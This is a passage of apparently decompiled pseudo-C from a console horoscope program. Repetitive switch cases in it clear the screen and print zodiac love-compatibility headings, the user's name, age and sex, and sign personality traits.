																																														__eax = E013D1C60(__ebx, __ecx, __edi, __esi, __eflags);
																																														__eax = __eax - 1;
																																														__eflags = __eax - 5;
																																													} while (__eflags <= 0);
																																													_pop(__esi);
																																													goto L374;
																																												}
																																												goto L500;
																																											case 6:
																																												L310:
																																												E013DB418(__ebx, __edx, __eflags, "cls") = E013D1AD0();
																																												__edx = _v16;
																																												__edx = __esi;
																																												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v16, __ebx);
																																												_push("aquarius AND ARIES LOVE COMPATIBILITY");
																																												 *0x13fe250 = 0x80005;
																																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																												__edx = 0xa;
																																												__eax = E013D1B90(__ebx, 0xa, __edi);
																																												__edx = _v16;
																																												_push(__edx);
																																												_push(__esi);
																																												_push(__ebx);
																																												_push(__edi);
																																												L294();
																																												__esp = 0x20 + __esp;
																																												goto L323;
																																											case 7:
																																												L311:
																																												E013DB418(__ebx, __edx, __eflags, "cls") = E013D1AD0();
																																												__eax = _v16;
																																												__edx = __esi;
																																												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v16, __ebx);
																																												_push("aquarius AND TAURUS LOVE COMPATIBILITY");
																																												 *0x13fe250 = 0x80005;
																																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																												__edx = 0x15;
																																												E013D1B90(__ebx, 0x15, __edi) = _v16;
																																												_push(_v16);
																																												_push(__esi);
																																												_push(__ebx);
																																												_push(__edi);
																																												L294();
																																												__esp = 0x20 + __esp;
																																												goto L323;
																																											case 8:
																																												L312:
																																												E013DB418(__ebx, __edx, __eflags, "cls") = E013D1AD0();
																																												__ecx = _v16;
																																												__edx = __esi;
																																												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v16, __ebx);
																																												_push("aquarius AND GEMINI LOVE COMPATIBILITY");
																																												 *0x13fe250 = 0x80005;
																																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																												__edx = 0x20;
																																												__eax = E013D1B90(__ebx, 0x20, __edi);
																																												__ecx = _v16;
																																												_push(_v16);
																																												_push(__esi);
																																												_push(__ebx);
																																												_push(__edi);
																																												L294();
																																												__esp = 0x20 + __esp;
																																												goto L323;
																																											case 9:
																																												L313:
																																												E013DB418(__ebx, __edx, __eflags, "cls") = E013D1AD0();
																																												__edx = _v16;
																																												__edx = __esi;
																																												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v16, __ebx);
																																												_push("aquarius AND CANCER LOVE COMPATIBILITY");
																																												 *0x13fe250 = 0x80005;
																																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																												__edx = 0x28;
																																												__eax = E013D1B90(__ebx, 0x28, __edi);
																																												__edx = _v16;
																																												_push(__edx);
																																												_push(__esi);
																																												_push(__ebx);
																																												_push(__edi);
																																												L294();
																																												__esp = 0x20 + __esp;
																																												goto L323;
																																											case 0xa:
																																												L314:
																																												E013DB418(__ebx, __edx, __eflags, "cls") = E013D1AD0();
																																												__eax = _v16;
																																												__edx = __esi;
																																												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v16, __ebx);
																																												_push("aquarius AND LEO LOVE COMPATIBILITY");
																																												 *0x13fe250 = 0x80005;
																																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																												__edx = 0x30;
																																												E013D1B90(__ebx, 0x30, __edi) = _v16;
																																												_push(_v16);
																																												_push(__esi);
																																												_push(__ebx);
																																												_push(__edi);
																																												L294();
																																												__esp = 0x20 + __esp;
																																												goto L323;
																																											case 0xb:
																																												L315:
																																												E013DB418(__ebx, __edx, __eflags, "cls") = E013D1AD0();
																																												__ecx = _v16;
																																												__edx = __esi;
																																												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v16, __ebx);
																																												_push("aquarius AND VIRGO LOVE COMPATIBILITY");
																																												 *0x13fe250 = 0x80005;
																																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																												__edx = 0x37;
																																												__eax = E013D1B90(__ebx, 0x37, __edi);
																																												__ecx = _v16;
																																												_push(_v16);
																																												_push(__esi);
																																												_push(__ebx);
																																												_push(__edi);
																																												L294();
																																												__esp = 0x20 + __esp;
																																												goto L323;
																																											case 0xc:
																																												L316:
																																												E013DB418(__ebx, __edx, __eflags, "cls") = E013D1AD0();
																																												__edx = _v16;
																																												__edx = __esi;
																																												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v16, __ebx);
																																												_push("aquarius AND LIBRA LOVE COMPATIBILITY");
																																												 *0x13fe250 = 0x80005;
																																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																												__edx = 0x3d;
																																												__eax = E013D1B90(__ebx, 0x3d, __edi);
																																												__edx = _v16;
																																												_push(__edx);
																																												_push(__esi);
																																												_push(__ebx);
																																												_push(__edi);
																																												L294();
																																												__esp = 0x20 + __esp;
																																												goto L323;
																																											case 0xd:
																																												L317:
																																												E013DB418(__ebx, __edx, __eflags, "cls") = E013D1AD0();
																																												__eax = _v16;
																																												__edx = __esi;
																																												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v16, __ebx);
																																												_push("aquarius AND SCORPIO LOVE COMPATIBILITY");
																																												 *0x13fe250 = 0x80005;
																																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																												__edx = 0x42;
																																												E013D1B90(__ebx, 0x42, __edi) = _v16;
																																												_push(_v16);
																																												_push(__esi);
																																												_push(__ebx);
																																												_push(__edi);
																																												L294();
																																												__esp = 0x20 + __esp;
																																												goto L323;
																																											case 0xe:
																																												L318:
																																												E013DB418(__ebx, __edx, __eflags, "cls") = E013D1AD0();
																																												__ecx = _v16;
																																												__edx = __esi;
																																												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v16, __ebx);
																																												_push("aquarius AND SAGGITARIUS LOVE COMPATIBILITY");
																																												 *0x13fe250 = 0x80005;
																																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																												__edx = 0x46;
																																												__eax = E013D1B90(__ebx, 0x46, __edi);
																																												__ecx = _v16;
																																												_push(_v16);
																																												_push(__esi);
																																												_push(__ebx);
																																												_push(__edi);
																																												L294();
																																												__esp = 0x20 + __esp;
																																												goto L323;
																																											case 0xf:
																																												L319:
																																												E013DB418(__ebx, __edx, __eflags, "cls") = E013D1AD0();
																																												__edx = _v16;
																																												__edx = __esi;
																																												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v16, __ebx);
																																												_push("aquarius AND CAPRICORN LOVE COMPATIBILITY");
																																												 *0x13fe250 = 0x80005;
																																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																												__edx = 0x49;
																																												__eax = E013D1B90(__ebx, 0x49, __edi);
																																												__edx = _v16;
																																												_push(__edx);
																																												_push(__esi);
																																												_push(__ebx);
																																												_push(__edi);
																																												L294();
																																												__esp = 0x20 + __esp;
																																												goto L323;
																																											case 0x10:
																																												L320:
																																												E013DB418(__ebx, __edx, __eflags, "cls") = E013D1AD0();
																																												__eax = _v16;
																																												__edx = __esi;
																																												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v16, __ebx);
																																												_push("aquarius AND AQUARIUS LOVE COMPATIBILITY");
																																												 *0x13fe250 = 0x80005;
																																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																												__edx = 0x4b;
																																												E013D1B90(__ebx, 0x4b, __edi) = _v16;
																																												_push(_v16);
																																												_push(__esi);
																																												_push(__ebx);
																																												_push(__edi);
																																												L294();
																																												__esp = 0x20 + __esp;
																																												goto L323;
																																											case 0x11:
																																												L321:
																																												E013DB418(__ebx, __edx, __eflags, "cls") = E013D1AD0();
																																												__ecx = _v16;
																																												__edx = __esi;
																																												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v16, __ebx);
																																												_push("aquarius AND PISCES LOVE COMPATIBILITY");
																																												 *0x13fe250 = 0x80005;
																																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																												__edx = 0x4c;
																																												__eax = E013D1B90(__ebx, 0x4c, __edi);
																																												__ecx = _v16;
																																												_push(_v16);
																																												_push(__esi);
																																												_push(__ebx);
																																												_push(__edi);
																																												L294();
																																												__esp = 0x20 + __esp;
																																												goto L323;
																																										}
																																										L323:
																																										__eax = E013DB418(__ebx, __edx, __eflags, "cls");
																																										_push(__esi);
																																										_push("Name: %s");
																																										 *0x13fe250 = 0x30037;
																																										E013DB9F5(__ebx, __edx, __edi, __esi, __eflags) = _v52;
																																										_push(_v52);
																																										_push("Age=%d");
																																										 *0x13fe250 = 0x40037;
																																										E013DB9F5(__ebx, __edx, __edi, __esi, __eflags) = _v56;
																																										 *0x13fe250 = 0x50037;
																																										_push(E013DC111(_v56));
																																										_push("Sex=%c");
																																										__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																										_push("Your horoscope sign is Aquarius-The Water Bearer");
																																										 *0x13fe250 = 0x20003;
																																										__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																										_push("..-\"-._.-\"-._.-");
																																										 *0x13fe250 = 0x30005;
																																										__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																										_push("..-\"-._.-\"-._.-\n\n");
																																										 *0x13fe250 = 0x40005;
																																										__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																										__esp = 0x2c + __esp;
																																										_v64 = "\n*  You have great desire for material gain.";
																																										_v60 = "\n*  You are tireless worker and are willing to work for what you want.";
																																										__eax = E013D1C60(__ebx, __ecx, __edi, __esi, __eflags);
																																										__eax = __eax - 1;
																																										__eflags = __eax - 5;
																																									} while (__eflags <= 0);
																																									_pop(__edi);
																																									goto L325;
																																								}
																																								goto L500;
																																							case 6:
																																								L277:
																																								E013DB418(__ebx, __edx, __eflags, "cls") = E013D1A50();
																																								__edx = _v12;
																																								__edx = __esi;
																																								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v12, __ebx);
																																								_push("CAPRICORN AND ARIES LOVE COMPATIBILITY");
																																								 *0x13fe250 = 0x80005;
																																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																								__edx = 9;
																																								__eax = E013D1B90(__ebx, 9, __edi);
																																								__edx = _v12;
																																								_push(__edx);
																																								_push(__esi);
																																								_push(__ebx);
																																								_push(__edi);
																																								L261();
																																								__esp = 0x20 + __esp;
																																								goto L290;
																																							case 7:
																																								L278:
																																								E013DB418(__ebx, __edx, __eflags, "cls") = E013D1A50();
																																								__eax = _v12;
																																								__edx = __esi;
																																								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v12, __ebx);
																																								_push("CAPRICORN AND TAURUS LOVE COMPATIBILITY");
																																								 *0x13fe250 = 0x80005;
																																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																								__edx = 0x14;
																																								E013D1B90(__ebx, 0x14, __edi) = _v12;
																																								_push(_v12);
																																								_push(__esi);
																																								_push(__ebx);
																																								_push(__edi);
																																								L261();
																																								__esp = 0x20 + __esp;
																																								goto L290;
																																							case 8:
																																								L279:
																																								E013DB418(__ebx, __edx, __eflags, "cls") = E013D1A50();
																																								__ecx = _v12;
																																								__edx = __esi;
																																								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v12, __ebx);
																																								_push("CAPRICORN AND GEMINI LOVE COMPATIBILITY");
																																								 *0x13fe250 = 0x80005;
																																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																								__edx = 0x1e;
																																								__eax = E013D1B90(__ebx, 0x1e, __edi);
																																								__ecx = _v12;
																																								_push(_v12);
																																								_push(__esi);
																																								_push(__ebx);
																																								_push(__edi);
																																								L261();
																																								__esp = 0x20 + __esp;
																																								goto L290;
																																							case 9:
																																								L280:
																																								E013DB418(__ebx, __edx, __eflags, "cls") = E013D1A50();
																																								__edx = _v12;
																																								__edx = __esi;
																																								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v12, __ebx);
																																								_push("CAPRICORN AND CANCER LOVE COMPATIBILITY");
																																								 *0x13fe250 = 0x80005;
																																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																								__edx = 0x27;
																																								__eax = E013D1B90(__ebx, 0x27, __edi);
																																								__edx = _v12;
																																								_push(__edx);
																																								_push(__esi);
																																								_push(__ebx);
																																								_push(__edi);
																																								L261();
																																								__esp = 0x20 + __esp;
																																								goto L290;
																																							case 0xa:
																																								L281:
																																								E013DB418(__ebx, __edx, __eflags, "cls") = E013D1A50();
																																								__eax = _v12;
																																								__edx = __esi;
																																								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v12, __ebx);
																																								_push("CAPRICORN AND LEO LOVE COMPATIBILITY");
																																								 *0x13fe250 = 0x80005;
																																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																								__edx = 0x2f;
																																								E013D1B90(__ebx, 0x2f, __edi) = _v12;
																																								_push(_v12);
																																								_push(__esi);
																																								_push(__ebx);
																																								_push(__edi);
																																								L261();
																																								__esp = 0x20 + __esp;
																																								goto L290;
																																							case 0xb:
																																								L282:
																																								E013DB418(__ebx, __edx, __eflags, "cls") = E013D1A50();
																																								__ecx = _v12;
																																								__edx = __esi;
																																								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v12, __ebx);
																																								_push("CAPRICORN AND VIRGO LOVE COMPATIBILITY");
																																								 *0x13fe250 = 0x80005;
																																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																								__edx = 0x36;
																																								__eax = E013D1B90(__ebx, 0x36, __edi);
																																								__ecx = _v12;
																																								_push(_v12);
																																								_push(__esi);
																																								_push(__ebx);
																																								_push(__edi);
																																								L261();
																																								__esp = 0x20 + __esp;
																																								goto L290;
																																							case 0xc:
																																								L283:
																																								E013DB418(__ebx, __edx, __eflags, "cls") = E013D1A50();
																																								__edx = _v12;
																																								__edx = __esi;
																																								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v12, __ebx);
																																								_push("CAPRICORN AND LIBRA LOVE COMPATIBILITY");
																																								 *0x13fe250 = 0x80005;
																																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																								__edx = 0x3c;
																																								__eax = E013D1B90(__ebx, 0x3c, __edi);
																																								__edx = _v12;
																																								_push(__edx);
																																								_push(__esi);
																																								_push(__ebx);
																																								_push(__edi);
																																								L261();
																																								__esp = 0x20 + __esp;
																																								goto L290;
																																							case 0xd:
																																								L284:
																																								E013DB418(__ebx, __edx, __eflags, "cls") = E013D1A50();
																																								__eax = _v12;
																																								__edx = __esi;
																																								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v12, __ebx);
																																								_push("CAPRICORN AND SCORPIO LOVE COMPATIBILITY");
																																								 *0x13fe250 = 0x80005;
																																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																								__edx = 0x41;
																																								E013D1B90(__ebx, 0x41, __edi) = _v12;
																																								_push(_v12);
																																								_push(__esi);
																																								_push(__ebx);
																																								_push(__edi);
																																								L261();
																																								__esp = 0x20 + __esp;
																																								goto L290;
																																							case 0xe:
																																								L285:
																																								E013DB418(__ebx, __edx, __eflags, "cls") = E013D1A50();
																																								__ecx = _v12;
																																								__edx = __esi;
																																								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v12, __ebx);
																																								_push("CAPRICORN AND SAGGITARIUS LOVE COMPATIBILITY");
																																								 *0x13fe250 = 0x80005;
																																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																								__edx = 0x45;
																																								__eax = E013D1B90(__ebx, 0x45, __edi);
																																								__ecx = _v12;
																																								_push(_v12);
																																								_push(__esi);
																																								_push(__ebx);
																																								_push(__edi);
																																								L261();
																																								__esp = 0x20 + __esp;
																																								goto L290;
																																							case 0xf:
																																								L286:
																																								E013DB418(__ebx, __edx, __eflags, "cls") = E013D1A50();
																																								__edx = _v12;
																																								__edx = __esi;
																																								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v12, __ebx);
																																								_push("CAPRICORN AND CAPRICORN LOVE COMPATIBILITY");
																																								 *0x13fe250 = 0x80005;
																																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																								__edx = 0x48;
																																								__eax = E013D1B90(__ebx, 0x48, __edi);
																																								__edx = _v12;
																																								_push(__edx);
																																								_push(__esi);
																																								_push(__ebx);
																																								_push(__edi);
																																								L261();
																																								__esp = 0x20 + __esp;
																																								goto L290;
																																							case 0x10:
																																								L287:
																																								E013DB418(__ebx, __edx, __eflags, "cls") = E013D1A50();
																																								__eax = _v12;
																																								__edx = __esi;
																																								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v12, __ebx);
																																								_push("CAPRICORN AND AQUARIUS LOVE COMPATIBILITY");
																																								 *0x13fe250 = 0x80005;
																																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																								__edx = 0x49;
																																								E013D1B90(__ebx, 0x49, __edi) = _v12;
																																								_push(_v12);
																																								_push(__esi);
																																								_push(__ebx);
																																								_push(__edi);
																																								L261();
																																								__esp = 0x20 + __esp;
																																								goto L290;
																																							case 0x11:
																																								L288:
																																								E013DB418(__ebx, __edx, __eflags, "cls") = E013D1A50();
																																								__ecx = _v12;
																																								__edx = __esi;
																																								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v12, __ebx);
																																								_push("CAPRICORN AND PISCES LOVE COMPATIBILITY");
																																								 *0x13fe250 = 0x80005;
																																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																								__edx = 0x4a;
																																								__eax = E013D1B90(__ebx, 0x4a, __edi);
																																								__ecx = _v12;
																																								_push(_v12);
																																								_push(__esi);
																																								_push(__ebx);
																																								_push(__edi);
																																								L261();
																																								__esp = 0x20 + __esp;
																																								goto L290;
																																						}
																																						L290:
																																						__eax = E013DB418(__ebx, __edx, __eflags, "cls");
																																						_push(__esi);
																																						_push("Name: %s");
																																						 *0x13fe250 = 0x30037;
																																						E013DB9F5(__ebx, __edx, __edi, __esi, __eflags) = _v48;
																																						_push(_v48);
																																						_push("Age=%d");
																																						 *0x13fe250 = 0x40037;
																																						E013DB9F5(__ebx, __edx, __edi, __esi, __eflags) = _v52;
																																						 *0x13fe250 = 0x50037;
																																						_push(E013DC111(_v52));
																																						_push("Sex=%c");
																																						__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																						__esp = 0x20 + __esp;
																																						__eax = E013D1A50();
																																						_v64 = "\n*  You are usually ambitious.";
																																						_v60 = "\n*  You marked by a purposeful pursuit of your destiny.";
																																						_v56 = "\n*  You have a sense of purpose and a great faith in your own ability.";
																																						__eax = E013D1C60(__ebx, __ecx, __edi, __esi, __eflags);
																																						__eax = __eax - 1;
																																						__eflags = __eax - 5;
																																					} while (__eflags <= 0);
																																					_pop(__edi);
																																					goto L292;
																																				}
																																				goto L500;
																																			case 6:
																																				L245:
																																				E013DB418(__ebx, __edx, __eflags, "cls") = E013D19D0();
																																				__edx = __esi;
																																				__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
																																				_push("SAGGITARIUS AND ARIES LOVE COMPATIBILITY");
																																				 *0x13fe250 = 0x80005;
																																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																				__edx = 8;
																																				__eax = E013D1B90(__ebx, 8, __edi);
																																				__edx = _v20;
																																				_push(__ebx);
																																				_push(__esi);
																																				_push(__edi);
																																				_push(__edx);
																																				L230();
																																				__esp = 0x20 + __esp;
																																				goto L258;
																																			case 7:
																																				L246:
																																				E013DB418(__ebx, __edx, __eflags, "cls") = E013D19D0();
																																				__edx = __esi;
																																				__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
																																				_push("SAGGITARIUS AND TAURUS LOVE COMPATIBILITY");
																																				 *0x13fe250 = 0x80005;
																																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																				__edx = 0x13;
																																				__eax = E013D1B90(__ebx, 0x13, __edi);
																																				__edx = _v20;
																																				_push(__ebx);
																																				_push(__esi);
																																				_push(__edi);
																																				_push(__edx);
																																				L230();
																																				__esp = 0x20 + __esp;
																																				goto L258;
																																			case 8:
																																				L247:
																																				E013DB418(__ebx, __edx, __eflags, "cls") = E013D19D0();
																																				__edx = __esi;
																																				__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
																																				_push("SAGGITARIUS AND GEMINI LOVE COMPATIBILITY");
																																				 *0x13fe250 = 0x80005;
																																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																				__edx = 0x1d;
																																				__eax = E013D1B90(__ebx, 0x1d, __edi);
																																				__edx = _v20;
																																				_push(__ebx);
																																				_push(__esi);
																																				_push(__edi);
																																				_push(__edx);
																																				L230();
																																				__esp = 0x20 + __esp;
																																				goto L258;
																																			case 9:
																																				L248:
																																				E013DB418(__ebx, __edx, __eflags, "cls") = E013D19D0();
																																				__edx = __esi;
																																				__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
																																				_push("SAGGITARIUS AND CANCER LOVE COMPATIBILITY");
																																				 *0x13fe250 = 0x80005;
																																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																				__edx = 0x26;
																																				__eax = E013D1B90(__ebx, 0x26, __edi);
																																				__edx = _v20;
																																				_push(__ebx);
																																				_push(__esi);
																																				_push(__edi);
																																				_push(__edx);
																																				L230();
																																				__esp = 0x20 + __esp;
																																				goto L258;
																																			case 0xa:
																																				L249:
																																				E013DB418(__ebx, __edx, __eflags, "cls") = E013D19D0();
																																				__edx = __esi;
																																				__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
																																				_push("SAGGITARIUS AND LEO LOVE COMPATIBILITY");
																																				 *0x13fe250 = 0x80005;
																																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																				__edx = 0x2e;
																																				__eax = E013D1B90(__ebx, 0x2e, __edi);
																																				__edx = _v20;
																																				_push(__ebx);
																																				_push(__esi);
																																				_push(__edi);
																																				_push(__edx);
																																				L230();
																																				__esp = 0x20 + __esp;
																																				goto L258;
																																			case 0xb:
																																				L250:
																																				E013DB418(__ebx, __edx, __eflags, "cls") = E013D19D0();
																																				__edx = __esi;
																																				__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
																																				_push("SAGGITARIUS AND VIRGO LOVE COMPATIBILITY");
																																				 *0x13fe250 = 0x80005;
																																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																				__edx = 0x35;
																																				__eax = E013D1B90(__ebx, 0x35, __edi);
																																				__edx = _v20;
																																				_push(__ebx);
																																				_push(__esi);
																																				_push(__edi);
																																				_push(__edx);
																																				L230();
																																				__esp = 0x20 + __esp;
																																				goto L258;
																																			case 0xc:
																																				L251:
																																				E013DB418(__ebx, __edx, __eflags, "cls") = E013D19D0();
																																				__edx = __esi;
																																				__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
																																				_push("SAGGITARIUS AND LIBRA LOVE COMPATIBILITY");
																																				 *0x13fe250 = 0x80005;
																																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																				__edx = 0x3b;
																																				__eax = E013D1B90(__ebx, 0x3b, __edi);
																																				__edx = _v20;
																																				_push(__ebx);
																																				_push(__esi);
																																				_push(__edi);
																																				_push(__edx);
																																				L230();
																																				__esp = 0x20 + __esp;
																																				goto L258;
																																			case 0xd:
																																				L252:
																																				E013DB418(__ebx, __edx, __eflags, "cls") = E013D19D0();
																																				__edx = __esi;
																																				__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
																																				_push("SAGGITARIUS AND SCORPIO LOVE COMPATIBILITY");
																																				 *0x13fe250 = 0x80005;
																																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																				__edx = 0x40;
																																				__eax = E013D1B90(__ebx, 0x40, __edi);
																																				__edx = _v20;
																																				_push(__ebx);
																																				_push(__esi);
																																				_push(__edi);
																																				_push(__edx);
																																				L230();
																																				__esp = 0x20 + __esp;
																																				goto L258;
																																			case 0xe:
																																				L253:
																																				E013DB418(__ebx, __edx, __eflags, "cls") = E013D19D0();
																																				__edx = __esi;
																																				__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
																																				_push("SAGGITARIUS AND SAGGITARIUS LOVE COMPATIBILITY");
																																				 *0x13fe250 = 0x80005;
																																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																				__edx = 0x44;
																																				__eax = E013D1B90(__ebx, 0x44, __edi);
																																				__edx = _v20;
																																				_push(__ebx);
																																				_push(__esi);
																																				_push(__edi);
																																				_push(__edx);
																																				L230();
																																				__esp = 0x20 + __esp;
																																				goto L258;
																																			case 0xf:
																																				L254:
																																				E013DB418(__ebx, __edx, __eflags, "cls") = E013D19D0();
																																				__edx = __esi;
																																				__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
																																				_push("SAGGITARIUS AND CAPRICORN LOVE COMPATIBILITY");
																																				 *0x13fe250 = 0x80005;
																																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																				__edx = 0x45;
																																				__eax = E013D1B90(__ebx, 0x45, __edi);
																																				__edx = _v20;
																																				_push(__ebx);
																																				_push(__esi);
																																				_push(__edi);
																																				_push(__edx);
																																				L230();
																																				__esp = 0x20 + __esp;
																																				goto L258;
																																			case 0x10:
																																				L255:
																																				E013DB418(__ebx, __edx, __eflags, "cls") = E013D19D0();
																																				__edx = __esi;
																																				__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
																																				_push("SAGGITARIUS AND AQUARIUS LOVE COMPATIBILITY");
																																				 *0x13fe250 = 0x80005;
																																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																				__edx = 0x46;
																																				__eax = E013D1B90(__ebx, 0x46, __edi);
																																				__edx = _v20;
																																				_push(__ebx);
																																				_push(__esi);
																																				_push(__edi);
																																				_push(__edx);
																																				L230();
																																				__esp = 0x20 + __esp;
																																				goto L258;
																																			case 0x11:
																																				L256:
																																				E013DB418(__ebx, __edx, __eflags, "cls") = E013D19D0();
																																				__edx = __esi;
																																				__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
																																				_push("SAGGITARIUS AND PISCES LOVE COMPATIBILITY");
																																				 *0x13fe250 = 0x80005;
																																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																				__edx = 0x47;
																																				__eax = E013D1B90(__ebx, 0x47, __edi);
																																				__edx = _v20;
																																				_push(__ebx);
																																				_push(__esi);
																																				_push(__edi);
																																				_push(__edx);
																																				L230();
																																				__esp = 0x20 + __esp;
																																				goto L258;
																																		}
																																		L258:
																																		__eax = E013DB418(__ebx, __edx, __eflags, "cls");
																																		_push(__esi);
																																		_push("Name: %s");
																																		 *0x13fe250 = 0x30037;
																																		__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																		__ecx = _v40;
																																		_push(_v40);
																																		_push("Age=%d");
																																		 *0x13fe250 = 0x40037;
																																		E013DB9F5(__ebx, __edx, __edi, __esi, __eflags) = __bl;
																																		 *0x13fe250 = 0x50037;
																																		_push(E013DC111(__bl));
																																		_push("Sex=%c");
																																		__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																		__esp = 0x20 + __esp;
																																		__eax = E013D19D0();
																																		_v48 = "\n*  You have an appetite for learning and travel.";
																																		_v44 = "\n*  You prefer to be footloose and fancy free.";
																																		__eax = E013D1C60(__ebx, __ecx, __edi, __esi, __eflags);
																																		__eax = __eax - 1;
																																		__eflags = __eax - 5;
																																	} while (__eflags <= 0);
																																	goto L259;
																																}
																																goto L500;
																															case 6:
																																L214:
																																E013DB418(__ebx, __edx, __eflags, "cls") = E013D1940();
																																__edx = __esi;
																																__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
																																_push("SCORPIUS AND ARIES LOVE COMPATIBILITY");
																																 *0x13fe250 = 0xa0005;
																																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																__edx = 7;
																																__eax = E013D1B90(__ebx, 7, __edi);
																																__edx = _v16;
																																_push(__ebx);
																																_push(__esi);
																																_push(__edi);
																																_push(__edx);
																																L199();
																																__esp = 0x20 + __esp;
																																goto L227;
																															case 7:
																																L215:
																																E013DB418(__ebx, __edx, __eflags, "cls") = E013D1940();
																																__edx = __esi;
																																__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
																																_push("SCORPIUS AND TAURUS LOVE COMPATIBILITY");
																																 *0x13fe250 = 0xa0005;
																																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																__edx = 0x12;
																																__eax = E013D1B90(__ebx, 0x12, __edi);
																																__edx = _v16;
																																_push(__ebx);
																																_push(__esi);
																																_push(__edi);
																																_push(__edx);
																																L199();
																																__esp = 0x20 + __esp;
																																goto L227;
																															case 8:
																																L216:
																																E013DB418(__ebx, __edx, __eflags, "cls") = E013D1940();
																																__edx = __esi;
																																__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
